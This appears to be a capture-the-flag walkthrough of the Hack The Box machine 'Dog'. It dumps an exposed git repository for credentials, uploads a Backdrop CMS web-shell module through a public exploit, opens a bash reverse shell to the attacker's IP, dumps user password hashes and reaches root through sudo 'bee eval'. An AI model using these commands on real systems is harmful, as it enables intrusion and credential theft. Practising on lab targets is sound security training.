> m4rt@CTF_ARCHIVE:~$

Hack The Box / LINUX / 2025-07-12

Hack The Box — Dog (Linux)

Exposed Backdrop CMS source reveals credentials, module upload abuse gives web RCE, and sudo access to `bee` allows direct PHP command execution to root.

Target

  • IP: 10.129.231.223

Recon

sudo nmap -sC -sV 10.129.231.223 -p- -T5 -v

PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_  256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp    open     http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
|_http-title: Home | Dog
| http-git:
|   10.129.231.223:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
8160/tcp  filtered patrol
10470/tcp filtered unknown
10889/tcp filtered unknown
18651/tcp filtered unknown
24497/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Go to http://10.129.231.223/.

It says the site is Backdrop CMS.

From the posts we notice a user dogBackDropSystem.

On the About page we notice an email:

support@dog.htb

Add dog.htb to /etc/hosts.

From nmap output we see the .git directory is exposed.

Download git-dumper: https://github.com/arthaud/git-dumper

mkdir www
python3 git-dumper/git_dumper.py http://10.129.231.223/ www
cd www
code .
# ctrl+shift+f

Search for dog.htb.

We find:

tiffany@dog.htb

In core/includes/bootstrap.inc we find the version:

define('BACKDROP_VERSION', '1.27.1');

In settings.php we find:

$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';

Log in to Backdrop with email tiffany@dog.htb and password BackDropJ2024DS2024.

There is an exploit:

https://www.exploit-db.com/exploits/52021?utm_source=dlvr.it&utm_medium=twitter

Download and run it:

python3 52021.py http://10.129.231.223

It creates a file shell.zip.

Go to:

http://10.129.231.223/?q=admin/installer/manual

Click Upload a module, theme, or layout archive to install.

We can upload a file.

Upload shell.zip.

Click install.

An error appears; the system expects a .tar.gz file.

unzip shell.zip
tar -czvf shell.tar.gz shell

Now we get shell.tar.gz.

Upload shell.tar.gz and click install.

It should install.

Go to:

http://10.129.231.223/modules/shell/shell.php

We can execute commands.

Start a netcat listener:

nc -vlnp 4444

Execute this command:

bash -c 'bash -i >& /dev/tcp/10.10.14.3/4444 0>&1'

We get a reverse shell as www-data.

mysql -u root -h 127.0.0.1 -p

Enter password BackDropJ2024DS2024.

show databases;

We notice database backdrop.

use backdrop;

show tables;

We notice table users.

select * from users;

We get usernames and hashes:

jPAdminB:$S$E7dig1GTaGJnzgAXAtOoPuaTjJ05fo8fH9USc6vO87T./ffdEr/.
jobert:$S$E/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1
dogBackDropSystem:$S$EfD1gJoRtn8I5TlqPTuTfHRBFQWL3x6vC5D3Ew9iU4RECrNuPPdD
john:$S$EYniSfxXt8z3gJ7pfhP5iIncFfCKz8EIkjUD66n/OTdQBFklAji.
morris:$S$E8OFpwBUqy/xCmMXMqFp3vyz1dJBifxgwNRMKktogL7VVk7yuulS
axel:$S$E/DHqfjBWPDLnkOP5auHhHDxF4U.sAJWiODjaumzxQYME6jeo9qV
rosa:$S$EsV26QVPbF.s0UndNPeNCxYEP/0z2O.2eLUNdKW/xYhg2.lsEcDT
tiffany:$S$EEAGFzd8HSQ/IzwpqI79aJgRvqZnH4JSKLv2C83wUphw0nuoTY8v

Put them in a file hash.

hashcat -a 0 ./hash ./rockyou.txt --username

It takes too long.

www-data@dog:/var/log$ ls -l /home
total 8
drwxr-xr-x 4 jobert     jobert     4096 Feb  7 15:59 jobert
drwxr-xr-x 3 johncusack johncusack 4096 Feb  7 15:59 johncusack

ssh johncusack@dog.htb

Use password BackDropJ2024DS2024.

sudo -l

```text
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee

file /usr/local/bin/bee

/usr/local/bin/bee: symbolic link to /backdrop_tool/bee/bee.php

This is:

https://backdropcms.org/project/bee

sudo /usr/local/bin/bee --help

We can see available bee commands.

We can specify the Backdrop directory with --root.

We can execute PHP code with the eval command in bee.

Run:

sudo /usr/local/bin/bee --root=/var/www/html/ eval 'system("/bin/bash")'

We get a shell as root.